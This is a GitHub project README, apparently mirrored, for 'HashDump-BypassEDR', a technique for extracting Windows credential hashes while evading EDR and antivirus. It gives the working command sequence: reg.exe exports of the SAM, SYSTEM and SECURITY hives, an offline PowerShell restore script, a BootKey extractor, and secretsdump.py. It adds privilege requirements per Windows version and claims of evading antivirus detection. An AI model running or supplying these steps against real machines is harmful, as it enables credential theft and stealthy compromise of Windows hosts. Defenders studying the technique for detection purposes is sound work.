AabyssZG/HashDump-BypassEDR

GitHub: AabyssZG/HashDump-BypassEDR

通过系统自带reg.exe导出注册表并结合离线脚本还原的方式,绕过EDR拦截实现Windows凭据哈希提取。

Stars: 251 | Forks: 32

![HashDump-BypassEDR](https://socialify.git.ci/AabyssZG/HashDump-BypassEDR/image?description=1&font=JetBrains+Mono&forks=1&issues=1&language=1&name=1&owner=1&pattern=Diagonal+Stripes&pulls=1&stargazers=1&theme=Dark) # 1# 项目概述 通过系统白程序 `Reg.exe` 的拓展应用,巧妙的绕过了杀软的拦截点,实现了绕过EDR从而DumpHash的目的。 根据实际测试,该方法针对Windows系列系统具有有效性,操作难度不大,具有实战价值。 本项目实战文章: - [如何绕过EDR实现DumpHash-AabyssZG'Blog](https://blog.zgsec.cn/archives/EDR-DumpHash.html) - [如何绕过EDR实现DumpHash-国家网络空间安全云社区](https://nccsec.cn/community/detail?id=QaW2xdTj8gE) 文章发表后,在国内和海外社区没找到相同的思路,原本以为是全球首发,后续根据粉丝评论,该思路之前海外有大佬分享过:[Dumping LSA secrets: a story about task decorrelation](https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/) # 2# 关键步骤 ## 2.1 第一步、导出reg文件 在目标机器上执行命令导出 `.reg` 文件 reg.exe export HKLM\SAM C:\Users\Public\sam.reg reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg reg.exe export HKLM\Security C:\Users\Public\security.reg ## 2.2 第二步、在本机还原二进制 将第一步的 `.reg` 文件下载到本机,在本机执行本项目的 `RegReduction.ps1` PowerShell脚本还原出二进制文件 .\RegReduction.ps1 **注明:Github下载脚本后编码默认为UTF-8,需要通过记事本改成ANSI(GB2312)才能正常执行** ![powershell.png](https://static.pigsec.cn/wp-content/uploads/repos/cas/d1/d1b9db86a99e0b934da10de1b0aaba46565d1778f3a5de0a781d7e4dea65cd6a.png) ## 2.3 第三步、拿到BootKey 在目标机器上执行 `BootKey.exe` 可执行程序,源代码为本项目的 `BootKey.c` 文件 BootKey.exe ![BootKey.png](https://static.pigsec.cn/wp-content/uploads/repos/cas/2d/2d88c244a494ce75cea7ca2c5ec4424a62bd6add8a34d3e9a707d7a89c993f67.png) 免杀测试(2026.5.10):[www.virustotal.com](https://www.virustotal.com/gui/file/cb96f754c4b235fd68964bb0474951bf987da5ef33386fe3ab1a912df907eb91) ![Virustotal.png](https://static.pigsec.cn/wp-content/uploads/repos/cas/cb/cb31a555150da9cd2e0c416cb868e3f09f412e17206d76f98fccc0aa08978c3b.png) ## 2.4 第四步、通过secretsdump拿到Hash python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL ![HashOut.png](https://static.pigsec.cn/wp-content/uploads/repos/cas/d4/d44d68e38ba5e2758eb9da09c103547140a8319d4cc8db489d8386becde763ac.png) # 3# 权限说明 本文有几个关键操作,在目标机器上的核心步骤就两个: - 使用 `reg.exe export` 命令导出关键注册表内容; - 使用 `BootKey.exe` 导出系统的BootKey。 对于不同系统也进行了测试,结果如下: - 在实际测试中,在Win10和Win11以及Windows Server 2025环境上使用 `reg.exe export` 命令导出注册表需要SYSTEM权限,而在Windows Server 2022及以下环境使用 `reg.exe export` 命令导出注册表只需要普通管理员权限即可(并不需要SYSTEM权限),如果使用 `reg.exe export` 命令导出注册表后文件只有1KB大小,那就说明权限不够。 - 在实际测试中,使用 `BootKey.exe` 提取程序导出BootKey是不需要管理员权限的,而且实测大部分杀软(目前遇到的杀软都不会)都不会查杀。 ## Forkers [![Forkers repo roster for @AabyssZG/HashDump-BypassEDR](http://reporoster.com/forks/AabyssZG/HashDump-BypassEDR)](https://github.com/AabyssZG/HashDump-BypassEDR/network/members) ## Star History [![Star History Chart](https://api.star-history.com/svg?repos=AabyssZG/HashDump-BypassEDR&type=Date)](https://star-history.com/#AabyssZG/HashDump-BypassEDR&Date)
标签:AI合规, C/C++, EDR绕过, IPv6, Libemu, OpenCanary, PowerShell, 事务性I/O, 免杀技术, 凭证提取, 暴力破解检测, 逆向工具, 高交互蜜罐